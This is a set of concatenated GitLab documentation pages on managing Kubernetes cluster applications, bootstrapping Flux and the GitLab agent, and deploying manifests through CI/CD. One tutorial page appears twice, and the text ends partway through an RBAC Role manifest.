---
title: Manage cluster applications
stage: Deploy
group: Environments
source: https://docs.gitlab.com/user/management_project_template
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/management_project_template.md
date_extracted: 2025-08-13
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

GitLab provides a cluster management project template, which you use to create a project. The project includes cluster applications that integrate with GitLab and extend GitLab functionality. You can use the pattern shown in the project to extend your custom cluster applications.

{{< alert type="note" >}}

The project template works on GitLab.com without modifications. If you're on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file.

{{< /alert >}}

## Use one project for the agent and your manifests

If you **have not yet** used the agent to connect your cluster with GitLab:

1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template).
1. [Configure the project for the agent](agent/install/_index.md).
1. In your project's settings, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`.
1. [Configure the files](#configure-the-project) as needed.

## Use separate projects for the agent and your manifests

If you have already configured the agent and connected a cluster with GitLab:

1. [Create a project from the cluster management project template](#create-a-project-based-on-the-cluster-management-project-template).
1. In the project where you configured your agent, [grant the agent access to the new project](agent/ci_cd_workflow.md#authorize-agent-access).
1. In the new project, create an [environment variable](../../ci/variables/_index.md#for-a-project) named `$KUBE_CONTEXT` and set the value to `path/to/agent-configuration-project:your-agent-name`.
1. In the new project, [configure the files](#configure-the-project) as needed.
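With `$KUBE_CONTEXT` set, a job in this project can select the agent's context before running `kubectl` commands. A minimal sketch of such a job, assuming the agent has been authorized for this project (the job name and image are illustrative, not part of the template):

```yaml
check cluster access:
  stage: deploy
  image: bitnami/kubectl:latest  # illustrative; the template ships its own base image
  script:
    # Point kubectl at the cluster connected through the agent
    - kubectl config use-context "$KUBE_CONTEXT"
    - kubectl get namespaces
```

The `kubectl config use-context "$KUBE_CONTEXT"` call is the standard way a CI/CD job targets a cluster connected through the agent for Kubernetes.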
## Create a project based on the cluster management project template

To create a project from the cluster management project template:

1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**.
1. Select **Create from template**.
1. From the list of templates, next to **GitLab Cluster Management**, select **Use template**.
1. Enter the project details.
1. Select **Create project**.
1. In the new project, [configure the files](#configure-the-project) as needed.

## Configure the project

After you use the cluster management template to create a project, you can configure:

- [The `.gitlab-ci.yml` file](#the-gitlab-ciyml-file).
- [The main `helmfile.yml` file](#the-main-helmfileyml-file).
- [The directory with built-in applications](#built-in-applications).

### The `.gitlab-ci.yml` file

The `.gitlab-ci.yml` file:

- Ensures you are on Helm version 3.
- Deploys the enabled applications from the project.

You can edit and extend the pipeline definitions. The base image used in the pipeline is built by the [cluster-applications](https://gitlab.com/gitlab-org/cluster-integration/cluster-applications) project. This image contains a set of Bash utility scripts to support [Helm v3 releases](https://helm.sh/docs/intro/using_helm/#three-big-concepts).

If you are on a GitLab Self-Managed instance, you must modify the `.gitlab-ci.yml` file. Specifically, the section that starts with the comment `Automatic package upgrades` does not work on a GitLab Self-Managed instance, because the `include` refers to a GitLab.com project. If you remove everything below this comment, the pipeline succeeds.

### The main `helmfile.yml` file

The template contains a [Helmfile](https://github.com/helmfile/helmfile) you can use to manage cluster applications with [Helm v3](https://helm.sh/). This file has a list of paths to other Helm files for each app. They're all commented out by default, so you must uncomment the paths for the apps that you would like to use in your cluster.

By default, each `helmfile.yaml` in these sub-paths has the attribute `installed: true`. This means that, depending on the state of your cluster and Helm releases, Helmfile attempts to install or update apps every time the pipeline runs. If you change this attribute to `installed: false`, Helmfile tries to uninstall this app from your cluster. [Read more](https://helmfile.readthedocs.io/en/latest/) about how Helmfile works.

### Built-in applications

The template contains an `applications` directory with a `helmfile.yaml` configured for each application in the template. The [built-in supported applications](https://gitlab.com/gitlab-org/project-templates/cluster-management/-/tree/master/applications) are:

- [Cert-manager](../infrastructure/clusters/manage/management_project_applications/certmanager.md)
- [GitLab Runner](../infrastructure/clusters/manage/management_project_applications/runner.md)
- [Ingress](../infrastructure/clusters/manage/management_project_applications/ingress.md)
- [Vault](../infrastructure/clusters/manage/management_project_applications/vault.md)

Each application has an `applications/{app}/values.yaml` file. For GitLab Runner, the file is `applications/{app}/values.yaml.gotmpl`. In this file, you can define default values for your app's Helm chart. Some apps already have defaults defined.
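The relationship between the main Helmfile and the per-app files described above can be sketched as follows. The paths follow the template layout; the release details are illustrative, not the template's exact contents:

```yaml
# helmfile.yml (main file): uncomment a path to enable that app
helmfiles:
  # - path: applications/cert-manager/helmfile.yaml
  - path: applications/ingress/helmfile.yaml

# applications/ingress/helmfile.yaml (illustrative sketch):
# change installed to false to have Helmfile uninstall the release
#
# releases:
#   - name: ingress
#     chart: ingress-nginx/ingress-nginx  # illustrative chart reference
#     installed: true
#     values:
#       - values.yaml
```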
---
title: Cluster management project (deprecated)
stage: Deploy
group: Environments
source: https://docs.gitlab.com/user/management_project
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/management_project.md
date_extracted: 2025-08-13
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Disabled on GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/issues/353410) in GitLab 15.0.

{{< /history >}}

{{< alert type="warning" >}}

The cluster management project was [deprecated](https://gitlab.com/groups/gitlab-org/configure/-/epics/8) in GitLab 14.5. To manage cluster applications, use the [GitLab agent for Kubernetes](agent/_index.md) with the [Cluster Management Project Template](management_project_template.md).

{{< /alert >}}

{{< alert type="flag" >}}

On GitLab Self-Managed, by default this feature is not available. To make it available, an administrator can [enable the feature flag](../../administration/feature_flags/_index.md) named `certificate_based_clusters`.

{{< /alert >}}

A project can be designated as the management project for a cluster. A management project can be used to run deployment jobs with Kubernetes [`cluster-admin`](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles) privileges. This can be useful for:

- Creating pipelines to install cluster-wide applications into your cluster. See the [management project template](management_project_template.md) for details.
- Any jobs that require `cluster-admin` privileges.

## Permissions

Only the management project receives `cluster-admin` privileges. All other projects continue to receive [namespace scoped `edit` level privileges](../project/clusters/cluster_access.md#rbac-cluster-resources).

Management projects are restricted to the following:

- For project-level clusters, the management project must be in the same namespace (or descendants) as the cluster's project.
- For group-level clusters, the management project must be in the same group (or descendants) as the cluster's group.
- For instance-level clusters, there are no such restrictions.
## How to create and configure a cluster management project

To use a cluster management project to manage your cluster:

1. Create a new project to serve as the cluster management project for your cluster.
1. [Associate the cluster with the management project](#associate-the-cluster-management-project-with-the-cluster).
1. [Configure your cluster's pipelines](#configuring-your-pipeline).
1. [Set the environment scope](#setting-the-environment-scope).

### Associate the cluster management project with the cluster

To associate a cluster management project with your cluster:

1. Go to the appropriate configuration page. For a:
   - [Project-level cluster](../project/clusters/_index.md), go to your project's **Operate > Kubernetes clusters** page.
   - [Group-level cluster](../group/clusters/_index.md), go to your group's **Kubernetes** page.
   - [Instance-level cluster](../instance/clusters/_index.md):
     1. On the left sidebar, at the bottom, select **Admin**.
     1. Select **Kubernetes**.
1. Expand **Advanced settings**.
1. From the **Cluster management project** dropdown list, select the cluster management project you created in the previous step.

### Configuring your pipeline

After designating a project as the management project for the cluster, add a `.gitlab-ci.yml` file in that project. For example:

```yaml
configure cluster:
  stage: deploy
  script: kubectl get namespaces
  environment:
    name: production
```

### Setting the environment scope

[Environment scopes](../project/clusters/multiple_kubernetes_clusters.md#setting-the-environment-scope) are usable when associating multiple clusters to the same management project. Each scope can only be used by a single cluster for a management project.

For example, the following Kubernetes clusters are associated with a management project:

| Cluster     | Environment scope |
| ----------- | ----------------- |
| Development | `*`               |
| Staging     | `staging`         |
| Production  | `production`      |

The environments set in the `.gitlab-ci.yml` file deploy to the Development, Staging, and Production clusters:

```yaml
stages:
  - deploy

configure development cluster:
  stage: deploy
  script: kubectl get namespaces
  environment:
    name: development

configure staging cluster:
  stage: deploy
  script: kubectl get namespaces
  environment:
    name: staging

configure production cluster:
  stage: deploy
  script: kubectl get namespaces
  environment:
    name: production
```
---
title: Create Kubernetes clusters
description: Amazon EKS, Azure AKS, Google GKE, and Civo.
stage: Deploy
group: Environments
source: https://docs.gitlab.com/user/clusters/create
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/_index.md
date_extracted: 2025-08-13
---
You can use Infrastructure as Code (IaC) to create clusters on cloud providers. You connect the clusters to GitLab by using the agent for Kubernetes.

- [Create a cluster on Google GKE](../../infrastructure/clusters/connect/new_gke_cluster.md)
- [Create a cluster on Amazon EKS](../../infrastructure/clusters/connect/new_eks_cluster.md)
- [Create a cluster on Azure AKS](../../infrastructure/clusters/connect/new_aks_cluster.md)
- [Create a cluster on Civo](../../infrastructure/clusters/connect/new_civo_cluster.md)
---
title: Get started connecting a Kubernetes cluster to GitLab
stage: Deploy
group: Environments
source: https://docs.gitlab.com/user/clusters/getting_started
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/getting_started.md
date_extracted: 2025-08-13
---
This page guides you through setting up a basic Kubernetes integration in a single project. If you're new to the GitLab agent for Kubernetes, pull-based deployment, or Flux, you should start here.

When you finish, you will be able to:

- View the status of your Kubernetes cluster with a real-time Kubernetes dashboard.
- Deploy updates to your cluster with Flux.
- Deploy updates to your cluster with GitLab CI/CD.

## Before you begin

Make sure you have the following before you complete this tutorial:

- A Kubernetes cluster that you can access locally with `kubectl`. To see what versions of Kubernetes GitLab supports, see [Supported Kubernetes versions for GitLab features](_index.md#supported-kubernetes-versions-for-gitlab-features).

You can check that everything is properly configured by running:

```shell
kubectl cluster-info
```

## Install and configure Flux

[Flux](https://fluxcd.io/flux/) is the recommended tool for GitOps deployments (also called pull-based deployments). Flux is a mature CNCF project.

To install Flux:

- Complete the steps in [Install the Flux CLI](https://fluxcd.io/flux/installation/#install-the-flux-cli) in the Flux documentation.

Check that the Flux CLI is properly installed by running:

```shell
flux -v
```

### Create a personal access token

To authenticate with the Flux CLI, create a personal access token with the `api` scope:

1. On the left sidebar, select your avatar.
1. Select **Edit profile**.
1. On the left sidebar, select **Access tokens**.
1. Enter a name and optional expiry date for the token.
1. Select the `api` scope.
1. Select **Create personal access token**.

You can also use a [project](../../project/settings/project_access_tokens.md) or [group access token](../../group/settings/group_access_tokens.md) with the `api` scope and the `maintainer` role.

### Bootstrap Flux

In this section, you'll bootstrap Flux into an empty GitLab repository with the [`flux bootstrap`](https://fluxcd.io/flux/installation/bootstrap/gitlab/) command.
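The `flux bootstrap gitlab` command reads the personal access token from the `GITLAB_TOKEN` environment variable, so export the token you created before you continue:

```shell
export GITLAB_TOKEN=<your-personal-access-token>
```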
To bootstrap a Flux installation:

- Run the `flux bootstrap gitlab` command. For example:

  ```shell
  flux bootstrap gitlab \
    --hostname=gitlab.example.org \
    --owner=my-group/optional-subgroup \
    --repository=my-repository \
    --branch=main \
    --path=clusters/testing \
    --deploy-token-auth
  ```

The arguments of `bootstrap` are:

| Argument     | Description |
|--------------|-------------|
| `hostname`   | Hostname of your GitLab instance. |
| `owner`      | GitLab group containing the Flux repository. |
| `repository` | GitLab project containing the Flux repository. |
| `branch`     | Git branch the changes are committed to. |
| `path`       | File path to a folder where the Flux configuration is stored. |

The bootstrap script does the following:

1. Creates a deploy token and saves it as a Kubernetes `secret`.
1. Creates an empty GitLab project, if the project specified by the `--repository` argument doesn't exist.
1. Generates Flux definition files for your project in a folder specified by the `--path` argument.
1. Commits the definition files to the branch specified by the `--branch` argument.
1. Applies the definition files to your cluster.

After you run the script, Flux will be ready to manage itself and any other resources you add to the GitLab project and path. The rest of this tutorial assumes your path is `clusters/testing`, and your project is under `my-group/optional-subgroup/my-repository`.

## Set up the agent connection

To connect your clusters, you need to install the GitLab agent for Kubernetes. You can do this by bootstrapping the agent with the GitLab CLI (`glab`).

1. [Install the GitLab CLI](https://gitlab.com/gitlab-org/cli/#installation). To check that the GitLab CLI is available, run:

   ```shell
   glab version
   ```

1. [Authenticate `glab`](https://gitlab.com/gitlab-org/cli/#installation) to your GitLab instance.
1. In the repository where you bootstrapped Flux, run the `glab cluster agent bootstrap` command:

   ```shell
   glab cluster agent bootstrap --manifest-path clusters/testing testing
   ```

By default, the command:

1. Registers the agent with `testing` as the name.
1. Configures the agent.
1. Configures an environment called `testing` with a dashboard for the agent.
1. Creates an agent token.
1. In the cluster, creates a Kubernetes secret with the agent token.
1. Commits the Flux Helm resources to the Git repository.
1. Triggers a Flux reconciliation.

For more information about configuring the agent, see [Installing the agent for Kubernetes](install/_index.md).

## Check out the dashboard for Kubernetes

The `glab cluster agent bootstrap` command created an environment within GitLab and [configured a dashboard](../../../ci/environments/kubernetes_dashboard.md).

To view your dashboard:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Operate > Environments**.
1. Select your environment. For example, `flux-system/gitlab-agent`.
1. Select the **Kubernetes overview** tab.

## Secure the deployment

{{< details >}}

- Tier: Premium, Ultimate

{{< /details >}}

So far, we've deployed an agent using the `.gitlab/agents/testing/config.yaml` file. This configuration enables user access using the service account configured for the agent deployment. User access is used by the dashboard for Kubernetes, and for local access.

To keep your deployments secure, you should change this setup to impersonate a GitLab user. In this case, you can manage your access to cluster resources through regular Kubernetes role-based access control (RBAC).

To enable user impersonation:

1. In your `.gitlab/agents/testing/config.yaml` file, replace `user_access.access_as.agent: {}` with `user_access.access_as.user: {}`.
1. Go to the configured dashboard for Kubernetes. If access is restricted, the dashboard displays an error message.
1. Add the following code to `clusters/testing/gitlab-user-read.yaml`:

   ```yaml
   apiVersion: rbac.authorization.k8s.io/v1
   kind: ClusterRoleBinding
   metadata:
     name: gitlab-user-view
   roleRef:
     name: view
     kind: ClusterRole
     apiGroup: rbac.authorization.k8s.io
   subjects:
     - name: gitlab:user
       kind: Group
   ```

1. Wait a few seconds to allow Flux to apply the added manifest, then check the dashboard for Kubernetes again. The dashboard should be back to normal, thanks to the deployed cluster role binding that grants read access to all GitLab users.

For more information about user access, see [Grant users Kubernetes access](user_access.md).

## Keep everything up to date

You might need to upgrade Flux and `agentk` after installation. To do this:

- Rerun the `flux bootstrap gitlab` and `glab cluster agent bootstrap` commands.

## Next steps

You can deploy directly to your cluster from the project where you registered the agent and stored your Flux manifests. The agent is designed to support multi-tenancy, and you can scale your configuration to other projects and groups with the configured agent and Flux installation.

Consider working through the follow-up tutorial, [Get started deploying to Kubernetes](getting_started_deployments.md).

To learn more about using Kubernetes with GitLab, see:

- [Best practices for using the GitLab integration with Kubernetes](enterprise_considerations.md)
- Using the agent for [operational container scanning](vulnerabilities.md)
- Providing [remote workspaces](../../workspace/_index.md) for your engineers
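The user-impersonation change to the agent configuration file can be sketched as follows. This is a minimal example, assuming the tutorial's example project path; the `projects` entry authorizes that project for user access:

```yaml
# .gitlab/agents/testing/config.yaml
user_access:
  access_as:
    user: {}  # impersonate the GitLab user instead of the agent service account
  projects:
    - id: my-group/optional-subgroup/my-repository
```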
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Get started connecting a Kubernetes cluster to GitLab breadcrumbs: - doc - user - clusters - agent --- This page guides you through setting up a basic Kubernetes integration in a single project. If you're new to the GitLab agent for Kubernetes, pull-based deployment, or Flux, you should start here. When you finish, you will be able to: - View the status of your Kubernetes cluster with a real-time Kubernetes dashboard. - Deploy updates to your cluster with Flux. - Deploy updates to your cluster with GitLab CI/CD. ## Before you begin Make sure you have the following before you complete this tutorial: - A Kubernetes cluster that you can access locally with `kubectl`. To see what versions of Kubernetes GitLab supports, see [Supported Kubernetes versions for GitLab features](_index.md#supported-kubernetes-versions-for-gitlab-features). You can check that everything is properly configured by running: ```shell kubectl cluster-info ``` ## Install and configure Flux [Flux](https://fluxcd.io/flux/) is the recommended tool for GitOps deployments (also called pull-based deployments). Flux is a matured CNCF project. To install Flux: - Complete the steps in [Install the Flux CLI](https://fluxcd.io/flux/installation/#install-the-flux-cli) in the Flux documentation. Check that the Flux CLI is properly installed by running: ```shell flux -v ``` ### Create a personal access token To authenticate with the Flux CLI, create a personal access token with the `api` scope: 1. On the left sidebar, select your avatar. 1. Select **Edit profile**. 1. On the left sidebar, select **Access tokens**. 1. Enter a name and optional expiry date for the token. 1. Select the `api` scope. 1. Select **Create personal access token**. 
You can also use a [project](../../project/settings/project_access_tokens.md) or [group access token](../../group/settings/group_access_tokens.md) with the `api` scope and the `maintainer` role.

### Bootstrap Flux

In this section, you'll bootstrap Flux into an empty GitLab repository with the [`flux bootstrap`](https://fluxcd.io/flux/installation/bootstrap/gitlab/) command.

To bootstrap a Flux installation:

- Run the `flux bootstrap gitlab` command. For example:

  ```shell
  flux bootstrap gitlab \
    --hostname=gitlab.example.org \
    --owner=my-group/optional-subgroup \
    --repository=my-repository \
    --branch=main \
    --path=clusters/testing \
    --deploy-token-auth
  ```

The arguments of `bootstrap` are:

| Argument | Description |
|--------------|-------------|
| `hostname` | Hostname of your GitLab instance. |
| `owner` | GitLab group containing the Flux repository. |
| `repository` | GitLab project containing the Flux repository. |
| `branch` | Git branch the changes are committed to. |
| `path` | File path to a folder where the Flux configuration is stored. |

The bootstrap script does the following:

1. Creates a deploy token and saves it as a Kubernetes `secret`.
1. Creates an empty GitLab project if the project specified by the `--repository` argument doesn't exist.
1. Generates Flux definition files for your project in a folder specified by the `--path` argument.
1. Commits the definition files to the branch specified by the `--branch` argument.
1. Applies the definition files to your cluster.

After you run the script, Flux will be ready to manage itself and any other resources you add to the GitLab project and path.

The rest of this tutorial assumes your path is `clusters/testing`, and your project is under `my-group/optional-subgroup/my-repository`.

## Set up the agent connection

To connect your clusters, you need to install the GitLab agent for Kubernetes. You can do this by bootstrapping the agent with the GitLab CLI (`glab`).
1. [Install the GitLab CLI](https://gitlab.com/gitlab-org/cli/#installation).

   To check that the GitLab CLI is available, run:

   ```shell
   glab version
   ```

1. [Authenticate `glab`](https://gitlab.com/gitlab-org/cli/#installation) to your GitLab instance.
1. In the repository where you bootstrapped Flux, run the `glab cluster agent bootstrap` command:

   ```shell
   glab cluster agent bootstrap --manifest-path clusters/testing testing
   ```

By default, the command:

1. Registers the agent with `testing` as the name.
1. Configures the agent.
1. Configures an environment called `testing` with a dashboard for the agent.
1. Creates an agent token.
1. In the cluster, creates a Kubernetes secret with the agent token.
1. Commits the Flux Helm resources to the Git repository.
1. Triggers a Flux reconciliation.

For more information about configuring the agent, see [Installing the agent for Kubernetes](install/_index.md).

## Check out the dashboard for Kubernetes

The `glab cluster agent bootstrap` command created an environment in GitLab and [configured a dashboard](../../../ci/environments/kubernetes_dashboard.md).

To view your dashboard:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Operate > Environments**.
1. Select your environment. For example, `flux-system/gitlab-agent`.
1. Select the **Kubernetes overview** tab.

## Secure the deployment

{{< details >}}

- Tier: Premium, Ultimate

{{< /details >}}

So far, we've deployed an agent using the `.gitlab/agents/testing/config.yaml` file. This configuration enables user access using the service account configured for the agent deployment. User access is used by the dashboard for Kubernetes, and for local access.

To keep your deployments secure, you should change this setup to impersonate a GitLab user. In this case, you can manage your access to cluster resources through regular Kubernetes role-based access control (RBAC).

To enable user impersonation:
1. In your `.gitlab/agents/testing/config.yaml` file, replace `user_access.access_as.agent: {}` with `user_access.access_as.user: {}`.
1. Go to the configured dashboard for Kubernetes. If access is restricted, the dashboard displays an error message.
1. Add the following code to `clusters/testing/gitlab-user-read.yaml`:

   ```yaml
   apiVersion: rbac.authorization.k8s.io/v1
   kind: ClusterRoleBinding
   metadata:
     name: gitlab-user-view
   roleRef:
     name: view
     kind: ClusterRole
     apiGroup: rbac.authorization.k8s.io
   subjects:
     - name: gitlab:user
       kind: Group
   ```

1. Wait a few seconds to allow Flux to apply the added manifest, then check the dashboard for Kubernetes again. The dashboard should be back to normal, thanks to the deployed cluster role binding that grants read access to all GitLab users.

For more information about user access, see [Grant users Kubernetes access](user_access.md).

## Keep everything up to date

You might need to upgrade Flux and `agentk` after installation. To do this:

- Rerun the `flux bootstrap gitlab` and `glab cluster agent bootstrap` commands.

## Next steps

You can deploy directly to your cluster from the project where you registered the agent and stored your Flux manifests. The agent is designed to support multi-tenancy, and you can scale your configuration to other projects and groups with the configured agent and Flux installation.

Consider working through the follow-up tutorial, [Get started deploying to Kubernetes](getting_started_deployments.md).

To learn more about using Kubernetes with GitLab, see:

- [Best practices for using the GitLab integration with Kubernetes](enterprise_considerations.md)
- Using the agent for [operational container scanning](vulnerabilities.md)
- Providing [remote workspaces](../../workspace/_index.md) for your engineers
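The cluster role binding in the user-access example grants read access cluster-wide. If that is broader than you want, the same idea can be scoped to a single namespace with a `RoleBinding`. The following is a minimal sketch, not part of the official setup: the `staging` namespace name is an assumption, while the `gitlab:user` group and the built-in `view` cluster role are the same ones used in the example above.

```yaml
# Hypothetical namespace-scoped alternative to the ClusterRoleBinding above.
# Grants GitLab users read access only in the assumed `staging` namespace.
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: gitlab-user-view-staging
  namespace: staging  # assumption: replace with your own namespace
roleRef:
  name: view  # built-in ClusterRole, applied only within this namespace
  kind: ClusterRole
  apiGroup: rbac.authorization.k8s.io
subjects:
  - name: gitlab:user
    kind: Group
    apiGroup: rbac.authorization.k8s.io
```

Committed under `clusters/testing/`, Flux applies this like any other manifest; users would then see only resources in that namespace from the dashboard.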
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Get started deploying to Kubernetes
breadcrumbs:
  - doc
  - user
  - clusters
  - agent
url: https://docs.gitlab.com/user/clusters/getting_started_deployments
repo_url: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/getting_started_deployments.md
date_extracted: 2025-08-13
---
This page introduces you to deploying to Kubernetes using methods supported by GitLab. In the end, you will understand:

- How to deploy with Flux
- How to deploy or run commands against your cluster from GitLab CI/CD pipelines
- How to combine Flux and GitLab CI/CD for the best outcome

## Before you begin

This tutorial builds on the project you created in [Get started connecting a Kubernetes cluster to GitLab](getting_started.md). You'll use the same project you created in that tutorial. However, you can use any project with a connected Kubernetes cluster and a bootstrapped Flux installation.

## Run commands against your cluster from GitLab CI/CD

The agent for Kubernetes [integrates with GitLab CI/CD pipelines](ci_cd_workflow.md). You can use CI/CD to run commands like `kubectl apply` and `helm upgrade` against your cluster in a secure and scalable way.

In this section, you'll use the GitLab pipeline integration to create a secret in the cluster and use it to access the GitLab container registry. The rest of this tutorial will use the deployed secret.

1. [Create a deploy token](../../project/deploy_tokens/_index.md#create-a-deploy-token) with the `read_registry` scope.
1. Save your deploy token and username as CI/CD variables called `CONTAINER_REGISTRY_ACCESS_TOKEN` and `CONTAINER_REGISTRY_ACCESS_USERNAME`.
   - For both variables, set the environment to `container-registry-secret*`.
   - For `CONTAINER_REGISTRY_ACCESS_TOKEN`:
     - [Mask the variable](../../../ci/variables/_index.md#mask-a-cicd-variable).
     - [Protect the variable](../../../ci/variables/_index.md#protect-a-cicd-variable).
1. Add the following snippet to your `.gitlab-ci.yml` file, and update both `AGENT_KUBECONTEXT` variables to match your project's path:

   ```yaml
   stages:
     - setup
     - deploy
     - stop

   create-registry-secret:
     stage: setup
     image: "portainer/kubectl-shell:latest"
     variables:
       AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing
     before_script:
       # The available agents are automatically injected into the runner environment
       # We need to select the agent to use
       - kubectl config use-context $AGENT_KUBECONTEXT
     script:
       - kubectl delete secret gitlab-registry-auth -n flux-system --ignore-not-found
       - kubectl create secret docker-registry gitlab-registry-auth -n flux-system --docker-password="${CONTAINER_REGISTRY_ACCESS_TOKEN}" --docker-username="${CONTAINER_REGISTRY_ACCESS_USERNAME}" --docker-server="${CI_REGISTRY}"
     environment:
       name: container-registry-secret
       on_stop: delete-registry-secret

   delete-registry-secret:
     stage: stop
     image: "portainer/kubectl-shell:latest"
     variables:
       AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing
     before_script:
       # The available agents are automatically injected into the runner environment
       # We need to select the agent to use
       - kubectl config use-context $AGENT_KUBECONTEXT
     script:
       - kubectl delete secret -n flux-system gitlab-registry-auth
     environment:
       name: container-registry-secret
       action: stop
     when: manual
   ```

Before you continue, consider how you might run other commands with CI/CD.

## Build a simple manifest into an OCI image and deploy it to the cluster

For production use cases, it is a best practice to use an OCI repository as a caching layer between the Git repository and FluxCD. FluxCD checks for new images in the OCI repository, while a GitLab pipeline builds the Flux-compliant OCI images. To learn more about enterprise best practices, see [enterprise considerations](enterprise_considerations.md).

In this section, you'll build a simple Kubernetes manifest as an OCI artifact, then deploy it to your cluster.
1. Run the following `flux` CLI commands to tell Flux where to retrieve the specified OCI image and deploy its content. Adjust the `--url` value for your GitLab instance. You can find the container registry URL under **Deploy > Container registry**.

   You can inspect the created `clusters/testing/nginx.yaml` file to better understand how Flux finds the manifests to deploy.

   ```shell
   flux create source oci nginx-example \
     --url oci://registry.gitlab.example.org/my-group/optional-subgroup/my-repository/nginx-example \
     --tag latest \
     --secret-ref gitlab-registry-auth \
     --interval 1m \
     --namespace flux-system \
     --export > clusters/testing/nginx.yaml

   flux create kustomization nginx-example \
     --source OCIRepository/nginx-example \
     --path "." \
     --prune true \
     --target-namespace default \
     --interval 1m \
     --namespace flux-system \
     --export >> clusters/testing/nginx.yaml
   ```

1. We'll deploy NGINX as an example. Add the following YAML to `clusters/applications/nginx/nginx.yaml`:

   ```yaml
   apiVersion: apps/v1
   kind: Deployment
   metadata:
     name: nginx-example
     namespace: default
   spec:
     replicas: 1
     selector:
       matchLabels:
         app: nginx-example
     template:
       metadata:
         labels:
           app: nginx-example
       spec:
         containers:
           - name: nginx
             image: nginx:1.25
             ports:
               - containerPort: 80
                 protocol: TCP
   ---
   apiVersion: v1
   kind: Service
   metadata:
     name: nginx-example
     namespace: default
   spec:
     ports:
       - port: 80
         targetPort: 80
         protocol: TCP
     selector:
       app: nginx-example
   ```

1. Now, let's package the previous YAML into an OCI image.
Extend your `.gitlab-ci.yml` file with the following snippet, and again update the `AGENT_KUBECONTEXT` variable:

```yaml
nginx-deployment:
  stage: deploy
  variables:
    IMAGE_NAME: nginx-example  # Image name to push
    IMAGE_TAG: latest
    MANIFEST_PATH: "./clusters/applications/nginx"
    IMAGE_TITLE: NGINX example  # Image title to use in OCI annotation
    AGENT_KUBECONTEXT: my-group/optional-subgroup/my-repository:testing
    FLUX_OCI_REPO_NAME: nginx-example  # Flux OCIRepository to reconcile
    NAMESPACE: flux-system  # Namespace for the OCIRepository resource
  # This section configures a GitLab environment for the nginx deployment specifically
  environment:
    name: applications/nginx
    kubernetes:
      agent: $AGENT_KUBECONTEXT
      namespace: default
      flux_resource_path: kustomize.toolkit.fluxcd.io/v1/namespaces/flux-system/kustomizations/nginx-example  # We will deploy this resource in the next step
  image:
    name: "fluxcd/flux-cli:v2.4.0"
    entrypoint: [""]
  before_script:
    - kubectl config use-context $AGENT_KUBECONTEXT
  script:
    # This line builds and pushes the OCI container to the GitLab container registry.
    # You can read more about this command in https://fluxcd.io/flux/cmd/flux_push_artifact/
    - flux push artifact oci://${CI_REGISTRY_IMAGE}/${IMAGE_NAME}:${IMAGE_TAG} --source="${CI_REPOSITORY_URL}" --path="${MANIFEST_PATH}" --revision="${CI_COMMIT_SHORT_SHA}" --creds="${CI_REGISTRY_USER}:${CI_REGISTRY_PASSWORD}" --annotations="org.opencontainers.image.url=${CI_PROJECT_URL}" --annotations="org.opencontainers.image.title=${IMAGE_TITLE}" --annotations="com.gitlab.job.id=${CI_JOB_ID}" --annotations="com.gitlab.job.url=${CI_JOB_URL}"
    # This line triggers an immediate reconciliation of the resource. Otherwise Flux would reconcile following its configured reconciliation period.
    # You can read more about the various reconcile commands in https://fluxcd.io/flux/cmd/flux_reconcile/
    - flux reconcile source oci -n ${NAMESPACE} ${FLUX_OCI_REPO_NAME}
```
1. Commit and push the changes to your project, and wait for the build pipeline to finish.
1. On the left sidebar, select **Operate > Environments** and check the available [dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md). The `applications/nginx` environment should be healthy.

## Secure the GitLab pipeline access

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

The previously deployed agent is configured using the `.gitlab/agents/testing/config.yaml` file. By default, the configuration enables access to the clusters configured in the project where the GitLab pipelines run. By default, this access uses the deployed agent's service account to run commands against the cluster.

This access can be restricted either to a static service account identity or by using the CI/CD job as an identity in the cluster. Finally, regular Kubernetes RBAC can be used to limit the access of the CI/CD jobs in the cluster.

In this section, we'll restrict CI/CD access by adding an identity to every CI/CD job, and impersonating the job in the cluster.

1. To configure the CI/CD job impersonation, edit the `.gitlab/agents/testing/config.yaml` file, and add the following snippet to it, replacing the project `id` value with your own project's path:

   ```yaml
   ci_access:
     projects:
       - id: my-group/optional-subgroup/my-repository
         access_as:
           ci_job: {}
   ```

1. As the CI/CD jobs don't have any cluster bindings yet, we cannot run any Kubernetes commands from GitLab CI/CD. Let's enable CI/CD jobs to create `Secret` objects in the `flux-system` namespace.
Create the `clusters/testing/gitlab-ci-job-secret-write.yaml` file with the following content:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: secret-manager
  namespace: flux-system
rules:
  - apiGroups: [""]
    resources: ["secrets"]
    verbs: ["create", "delete"]
---
